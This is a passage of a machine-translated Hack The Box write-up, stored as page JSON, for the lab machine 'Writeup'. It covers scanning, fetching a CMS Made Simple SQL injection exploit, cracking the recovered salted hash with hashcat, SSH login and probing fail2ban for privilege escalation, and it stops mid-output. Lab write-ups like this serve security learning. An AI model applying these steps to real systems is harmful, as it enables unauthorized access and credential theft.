{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-writeup-en","result":{"data":{"markdownRemark":{"id":"697ae2fb-9707-52b1-9aea-3cb214c25e94","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-writeup\">original page</a>.</p>\n</blockquote>\n<p>I am learning about security using “Hack The Box,” a penetration testing learning platform.\nAt the time of writing, my rank on “Hack The Box” is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/5359265417f940dc8119c107426c30ca/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABW0lEQVQY0zWPTU8aURSG519076ZuNMoUBebecT6RITgEwUGwiARRY/we20SgaK07V7poumq6NHHroj/BX3UfL21cPDnJSd7nvMe4GaZcfTlR18NTks0m5fUmlXqTarJFvb1Ne2eXci1B+CXc0hrLKwFuFGP5ETIsI4KIrPQwLUdpMJ7/fFMvT/e8/v3N90lK//CM9GrE/vE5x+lXxrd3dAcHuGvrNDo9fTCh3uqwuzdgc7tHp79HzgmnQj4JXxmT25iHx6H69fMHd5NL4mSHrZ4WrFaxw5jB4QVeMcaM22SCGotOBRl4pF2BcFYIA5uFvItZkGohZ2JUmzOqfxQxHnXp9xr4DYtKy6XYEEStApXPNkFNYBVtiht5ZNnWYY8l6epGrn5XN7N8FgsmQfJBGXOZj3oxq2xniayQFELxn0BirU6xtEyS82xkSU93KtSNrHecf+JMXqr5rMkbq+PA9tiSbPUAAAAASUVORK5CYII='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/5359265417f940dc8119c107426c30ca/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/5359265417f940dc8119c107426c30ca/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" 
src=\"/static/5359265417f940dc8119c107426c30ca/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup of the retired HackTheBox machine “Writeup”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage actions that violate social order.</strong></p>\n<p>Please note that attempting to attack environments other than those you own or are authorized to access may violate the Act on Prohibition of Unauthorized Computer Access (Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 
0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#obtaining-user\">Obtaining User</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>For now, I will start with the usual port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Add the target machine IP to /etc/hosts (double quotes so that $RHOST expands) and run a fast scan</span>\n<span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">\"s/^[0-9].*$RHOST/10.10.10.138 $RHOST/g\"</span> /etc/hosts\nnmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n<span class=\"token comment\"># All ports</span>\nnmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p>Port 80 appears to be open, so I checked it.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre 
class=\"language-bash\"><code class=\"language-bash\">PORT   STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.4p1 Debian <span class=\"token number\">10</span>+deb9u6 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> <span class=\"token number\">37</span>:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> <span class=\"token number\">93</span>:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.25 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Nothing here yet.\n<span class=\"token operator\">|</span> http-robots.txt: <span class=\"token number\">1</span> disallowed entry \n<span class=\"token operator\">|</span>_/writeup/\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.25 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\nService Info: OS: Linux<span class=\"token punctuation\">;</span> 
CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>The part that caught my attention here was the following.</p>\n<p>It appeared to be configured so that user agents would not access <code class=\"language-text\">writeup</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">http-robots.txt: <span class=\"token number\">1</span> disallowed entry \n<span class=\"token operator\">|</span>_/writeup/</code></pre></div>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/28422767/what-is-a-disallowed-entry-when-nmap-scans-through-the-robots-txt-file\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">What is a ‘disallowed entry’ when nmap scans through the Robots.txt file? - Stack Overflow</a></p>\n<p>The robots.txt file looked like this.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#              __</span>\n<span class=\"token comment\">#      _(\\    |@@|</span>\n<span class=\"token comment\">#     (__/\\__ \\--/ __</span>\n<span class=\"token comment\">#        \\___|----|  |   __</span>\n<span class=\"token comment\">#            \\ }{ /\\ )_ / _\\</span>\n<span class=\"token comment\">#            /\\__/\\ \\__O (__</span>\n<span class=\"token comment\">#           (--/\\--)    \\__/</span>\n<span class=\"token comment\">#           _)(  )(_</span>\n<span class=\"token comment\">#          `---''---`</span>\n\n<span class=\"token comment\"># Disallow access to the blog until content is finished.</span>\nUser-agent: * \nDisallow: /writeup/</code></pre></div>\n<p>When I accessed port 80, the following page was displayed.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 607px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    
href=\"/static/834ecbf8e70c540dd8654222063be7c7/ef9e5/image-20220810234932067.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 142.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAdCAYAAACqhkzFAAAACXBIWXMAAAsTAAALEwEAmpwYAAAERElEQVRIx5VUXW8bRRT1j+AX8AN4gQcqEttr7/qbJHa8tnfXjjcGRJEQIAFVqUSlljaACFDxrxDQtKGUtAm1XTtOnCKgSM06T4dzZ3btOGqQ+nB05t47c+Z+zG6smLoP27yLVaJibpO3UU7/qmzNtIlKiCi2ErI+cxdVwjJ2ESul7yNt7CFl/KEcK+l7WCYKqR21OZd6oLiY+p3+31Q8ipWYjJyRs1nuyxMxOZBJPYTJgATz3CwQ/5u8TLhAMRGRi0uhL8szyeQjJJJdLCZ7XFPUeIiYKNesLaxnfkTD3EIr85NCm3CtX+ARjnWb69uom3fQtH5WvgwPZ40HCpK9KTYviUk2SyxFehCVpHukS5eY7p/up/SuQiSYnc5+R4mLoNixqES9+d50EHJrjRmJLcJVNbhtxeIr8wKJSzukFXFeoHooAYclN1hSzbpD3kJd2VvKroe+05DS5WVIK6LstfgOYobxiOnuqVuMBKed2FVsKOYEk2SFPb1OaI78acJM7aqhJowuYjKhhWQfcaOPTH6AbHGAXHEY8gAWfeLPFGZsRTZh5gY8rzVEKxY3ZOxdpK0+vNYh7PpIoVoboeGO0GwforVGkJvCvuY1X/vqzgiLiS5ER0DBnnKIoF3bh5Huwcz0kTLlbXXhNEYKrnMAp665oZh+wq7ua0FmNxVcCAUb3gHypQFKy0MUWG7G5uEP/kbj/b/ghOx+qNmjLeulzp+4EIotGr0ww3gXBgVaN57B/eIY7Y1jONefob05Qev7E/i3Juj8MIG3eYL2rRO4ZJ9+ia1cC/CqMVDVzAsys9ZmAPebCfzvJpq/DVDfCJC5EqB0NYD3VYA12UNuk1vcU756jNcomDgrmGSGVWZXvh6gdjNQbN8I8PpHAV65SLwXIHGJYl9P9B5eVN2YIH/lXMEh7C+5+eYEdR6qcHOF6wufTPCSM8HLHQp+fIzi57zsms68yosLnz1PkEMx8o9Rv/QU9qdP4Vz+V7F7+SnSF4l3/0Gx8wRlb4xV/wnqnSO47xzBefsIq60x3pChEDNBqsszcd0D9RQ8L2TanifM9xhxU2IHao9L2Pa+Oi86c+8wxWfTbI+nj1ZxO3q8PNyMHvhsT8sfn3rYPYU5Qdksh9q+ZhFsr4+xvDJErXGg/Gv+bI+sG7xsJnjmYa+tH6pNfmesMvAptv7WGOXVoXr0YssFknW0dtznCMpHLZ/cKvshsPkdV8J1pRoiXEffefTNlytD3UM1FBEMJxSXsfMmyXYxMVsvxLvTj1+qsLJ95AqPkcnx75QjZ/uzoSRPCYpTsjQ47ZTZRzL6SVh9ZQuMdF/5JKZt/kBSUUJRhoZWlyyWVPNH07JXWM5ymT6WJtOUUquMiV9KFTvL97sw18NTGUYlqVIIsQWSlZWT2BkfbclwroeL4Q9WTTsZ9u0FEJ2NRE8NpTd9nC+EZO+8Kc9DgufF/u/Mf9l3m0/mEwu7AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n  
            srcset=\"/static/834ecbf8e70c540dd8654222063be7c7/8ac56/image-20220810234932067.webp 240w,\n/static/834ecbf8e70c540dd8654222063be7c7/d3be9/image-20220810234932067.webp 480w,\n/static/834ecbf8e70c540dd8654222063be7c7/bf9cb/image-20220810234932067.webp 607w\"\n              sizes=\"(max-width: 607px) 100vw, 607px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/834ecbf8e70c540dd8654222063be7c7/8ff5a/image-20220810234932067.png 240w,\n/static/834ecbf8e70c540dd8654222063be7c7/e85cb/image-20220810234932067.png 480w,\n/static/834ecbf8e70c540dd8654222063be7c7/ef9e5/image-20220810234932067.png 607w\"\n            sizes=\"(max-width: 607px) 100vw, 607px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/834ecbf8e70c540dd8654222063be7c7/ef9e5/image-20220810234932067.png\"\n            alt=\"image-20220810234932067\"\n            title=\"image-20220810234932067\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>While I was at it, the <code class=\"language-text\">writeup</code> page also displayed normally for some reason.</p>\n<p>I had assumed access was restricted by robots.txt, but there did not seem to be any actual access restriction.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 917px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8c8163f1e8a28172390479dd3ba1c880/59000/image-20220811081451570.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 43.333333333333336%; position: relative; bottom: 0; left: 0; 
background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABPklEQVQoz62QW0/CQBSE92dQRYqItAhRuZgQAmpiTPzh8m5ior7YKzUhtltaIIaWdjzdUiW+yiZfZnZ2z14Oa6htKESzdYFaXUW11oB8fArpsEJUIZWrKJGWDmRSWfgsk45OUKoopHXhpbIscnbZG2J4fY/R7QP6gxt0rsYYjO6EP+8M0Gz3obR6ULcoP3ShnnWF5uQ5e5xM8PL6hqnzAcuyYZoWLHuaQ3PDMKH/wdiy6wuYoevwPI59Dfb8tMQqXCNJEyTJ/2Hv2hfSFPt7YRhm302x2WwE2S2FL+brKEIcR4iiX+I4Jl0LirUsY7adNd6ApmvQtBzDNKjhusgcx6Eee+Cc5/i5+nNf9J5zH/MgzJUy5nEPrutSUBTtFJP3fR/L5QJBGFDhHCHpYhGSrvDppnQoMJultC9GEHB8A86SVZWVIFuMAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8c8163f1e8a28172390479dd3ba1c880/8ac56/image-20220811081451570.webp 240w,\n/static/8c8163f1e8a28172390479dd3ba1c880/d3be9/image-20220811081451570.webp 480w,\n/static/8c8163f1e8a28172390479dd3ba1c880/f91b9/image-20220811081451570.webp 917w\"\n              sizes=\"(max-width: 917px) 100vw, 917px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8c8163f1e8a28172390479dd3ba1c880/8ff5a/image-20220811081451570.png 240w,\n/static/8c8163f1e8a28172390479dd3ba1c880/e85cb/image-20220811081451570.png 480w,\n/static/8c8163f1e8a28172390479dd3ba1c880/59000/image-20220811081451570.png 917w\"\n            sizes=\"(max-width: 917px) 100vw, 917px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8c8163f1e8a28172390479dd3ba1c880/59000/image-20220811081451570.png\"\n            alt=\"image-20220811081451570\"\n            title=\"image-20220811081451570\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the contents, it seemed to contain writeups for several HTB machines.</p>\n<p>However, the writeup for 
this machine was only partially written and did not contain any useful information.</p>\n<p>Also, when I tried enumerating with gobuster, it returned an error, and after that I could not even access the site in my browser for a while.</p>\n<p>It seems some sort of DoS protection was in place, apparently monitoring for 4xx errors.</p>\n<p>The Writeup page was accessed using a GET query like the following.</p>\n<p>Example: <code class=\"language-text\">http://10.10.10.138/writeup/index.php?page=ypuffy</code></p>\n<h2 id=\"obtaining-user\" style=\"position:relative;\"><a href=\"#obtaining-user\" aria-label=\"obtaining user permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Obtaining User</h2>\n<p>My guess was that it was retrieving text from the server by setting a file name in <code class=\"language-text\">page=</code>.</p>\n<p>However, I was not able to make progress with enumeration here.</p>\n<p>Next, from the page source I learned that it was using <code class=\"language-text\">CMS Made Simple</code>, so I tried several exploits against it.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 751px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1e02c583771524cd542ffc4b0b688653/c483d/image-20220811105655958.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    
style=\"padding-bottom: 47.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABxElEQVQoz52R2VITQRSG5yFcUBQhZliTYCAmiMiFy/tSXqg3kk3fwBuqApSSSWZNJrP2TEg+O12EB+BUffX/Z+k61XW0tfUiheI2rzY2ea3vsvqiwKPHqzx7vs72XpVKtUF5v075TYPq4TF7lbdyrsRGYYvNrRK6pKjv8XRljScrL9H07X0WHJ9+ofH+I4eNU3bKNXZKNfm4TrV2wtHJJ959+MxB/YRy9YjS3YKt3QP0naqioFcU2tnZV759/0G706XZ6tDp/Jb+l/KKZodWu0u73b2rte97P89b95w32wqNKUzDmMAbk4pb8ihhGmc8NLTJMMA3+tz0+vQuA66uJlxeWPztjbm6jDH6Mf4oJk1zokgQhoIkyQgCoYjl8gXLnhY5EZFnEzhDTGPMcCgwBxNsM8A2XCzDw7RiXC/FcRJMU3o3wZPEUU6W3SLEkhmaCFMCP8TyLEaBg+H8wxpZuL6r8oHbl7mJ6Q6UOmMbW/Udho6hfBBO5A8SpVrsRdgXJjd/rhkaUq9tQrkgyzJJLrcKMpEpzfP8Xpd+MbfUNE3lUWTEbog/GOH7AWksYMbDjzKfzckTgUhSwiCXpblqzOfzB/Efum+a15+6RmAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1e02c583771524cd542ffc4b0b688653/8ac56/image-20220811105655958.webp 240w,\n/static/1e02c583771524cd542ffc4b0b688653/d3be9/image-20220811105655958.webp 480w,\n/static/1e02c583771524cd542ffc4b0b688653/0d6a7/image-20220811105655958.webp 751w\"\n              sizes=\"(max-width: 751px) 100vw, 751px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1e02c583771524cd542ffc4b0b688653/8ff5a/image-20220811105655958.png 240w,\n/static/1e02c583771524cd542ffc4b0b688653/e85cb/image-20220811105655958.png 480w,\n/static/1e02c583771524cd542ffc4b0b688653/c483d/image-20220811105655958.png 751w\"\n            sizes=\"(max-width: 751px) 100vw, 751px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1e02c583771524cd542ffc4b0b688653/c483d/image-20220811105655958.png\"\n            alt=\"image-20220811105655958\"\n            title=\"image-20220811105655958\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Among the things I looked into, I found the following exploit.</p>\n<p>It appears that blind SQL injection was possible.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ searchsploit -m php/webapps/46635.py</code></pre></div>\n<p>Running the exploit allowed me to obtain a username and password hash.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 563px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/76bfc181db1ea0eb37a90d996763358e/7cb89/image-20220811110039876.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 31.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHklEQVQY0zWPa26DMBCEOVGlYgyEGAx+BxLyVtI2Snv/S0zXJvnxadaz3vU447WADRO63qDXHk07QEiNwQTIwaIjot8rR7V7eQ6MN/j4LFMvTHu676HsBhlnDHmeg5GynIEXBTgrFn3DX1BdvLyyLFER8Rxni4IgzeTsIIJCO+qkcjRQ1wnqPEJOlG4f0AWN1g1Qly3UaZN65rZLWtU1qipSJTL7c0gN/3uCvs8wXzPc44CBPPs80lIDYftEI1uUnKfBmDBB50RMHBdqeqk/BOjvmRJMMLQ0evY2I/ydYR9HeFL3PFHyLeTWLslnn9K/dT0sj2VhChinDcYdpaTaewsdDG73C8LowesKK9GgXi80UmDVCTR9m+o38esx5T/LvdLMzNj+PgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/76bfc181db1ea0eb37a90d996763358e/8ac56/image-20220811110039876.webp 240w,\n/static/76bfc181db1ea0eb37a90d996763358e/d3be9/image-20220811110039876.webp 480w,\n/static/76bfc181db1ea0eb37a90d996763358e/a1a69/image-20220811110039876.webp 563w\"\n              
sizes=\"(max-width: 563px) 100vw, 563px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/76bfc181db1ea0eb37a90d996763358e/8ff5a/image-20220811110039876.png 240w,\n/static/76bfc181db1ea0eb37a90d996763358e/e85cb/image-20220811110039876.png 480w,\n/static/76bfc181db1ea0eb37a90d996763358e/7cb89/image-20220811110039876.png 563w\"\n            sizes=\"(max-width: 563px) 100vw, 563px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/76bfc181db1ea0eb37a90d996763358e/7cb89/image-20220811110039876.png\"\n            alt=\"image-20220811110039876\"\n            title=\"image-20220811110039876\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After formatting the output salt and password hash as <code class=\"language-text\">$hash:$salt</code> and cracking it as <code class=\"language-text\">md5($salt.$pass)</code>, I was able to recover the password.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ hashcat -a <span class=\"token number\">0</span> -m <span class=\"token number\">20</span> ./hash /usr/share/wordlists/rockyou.txt</code></pre></div>\n<p>Using this password to connect over SSH allowed me to obtain user access.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 
2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>With <code class=\"language-text\">pspy</code> running, when I triggered fail2ban I confirmed that the following task was executed.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">PID</span><span class=\"token operator\">=</span><span class=\"token number\">22658</span>  <span class=\"token operator\">|</span> iptables -w -I f2b-apache-404 <span class=\"token number\">1</span> -s <span class=\"token number\">10.10</span>.14.4 -j REJECT --reject-with icmp-port-unreachable</code></pre></div>\n<p>Since fail2ban appeared to be running with root privileges, I investigated whether I could use that as a starting point for privilege escalation. However, even after checking the configuration files and permissions under <code class=\"language-text\">/etc/fail2ban</code>, I could not find anything useful.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">cat</span> /etc/fail2ban/jail.local \n<span class=\"token punctuation\">[</span>INCLUDES<span class=\"token punctuation\">]</span>\nbefore <span class=\"token operator\">=</span> paths-debian.conf\n\n<span class=\"token punctuation\">[</span>DEFAULT<span class=\"token punctuation\">]</span>\nignoreip <span class=\"token operator\">=</span> <span class=\"token number\">127.0</span>.0.1/8\nbantime  <span class=\"token operator\">=</span> <span class=\"token number\">120</span>\nmaxretry <span class=\"token operator\">=</span> <span class=\"token number\">10</span>\n\n<span class=\"token punctuation\">[</span>sshd<span class=\"token punctuation\">]</span>\nenabled <span class=\"token operator\">=</span> <span class=\"token 
boolean\">true</span>\n\n<span class=\"token punctuation\">[</span>apache-404<span class=\"token punctuation\">]</span>\nenabled  <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span>\nport     <span class=\"token operator\">=</span> http\nfilter   <span class=\"token operator\">=</span> apache-404\nlogpath  <span class=\"token operator\">=</span> /var/log/apache2/access.log <span class=\"token function\">tail</span>\nmaxretry <span class=\"token operator\">=</span> <span class=\"token number\">30</span>\n\n$ <span class=\"token function\">cat</span> /etc/fail2ban/filter.d/apache-404.conf \n<span class=\"token punctuation\">[</span>INCLUDES<span class=\"token punctuation\">]</span>\nbefore <span class=\"token operator\">=</span> apache-common.conf\n\n<span class=\"token punctuation\">[</span>Definition<span class=\"token punctuation\">]</span>\nfailregex <span class=\"token operator\">=</span> ^<span class=\"token operator\">&lt;</span>HOST<span class=\"token operator\">></span> .* <span class=\"token number\">40</span><span class=\"token punctuation\">[</span><span class=\"token number\">1234</span><span class=\"token punctuation\">]</span>$</code></pre></div>\n<p>At this point, the linpeas output showed that the current user belonged to various groups.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">id</span>\n<span class=\"token assign-left variable\">uid</span><span class=\"token operator\">=</span><span class=\"token number\">1000</span><span class=\"token punctuation\">(</span>jkr<span class=\"token punctuation\">)</span> <span class=\"token assign-left variable\">gid</span><span class=\"token operator\">=</span><span class=\"token number\">1000</span><span class=\"token punctuation\">(</span>jkr<span class=\"token 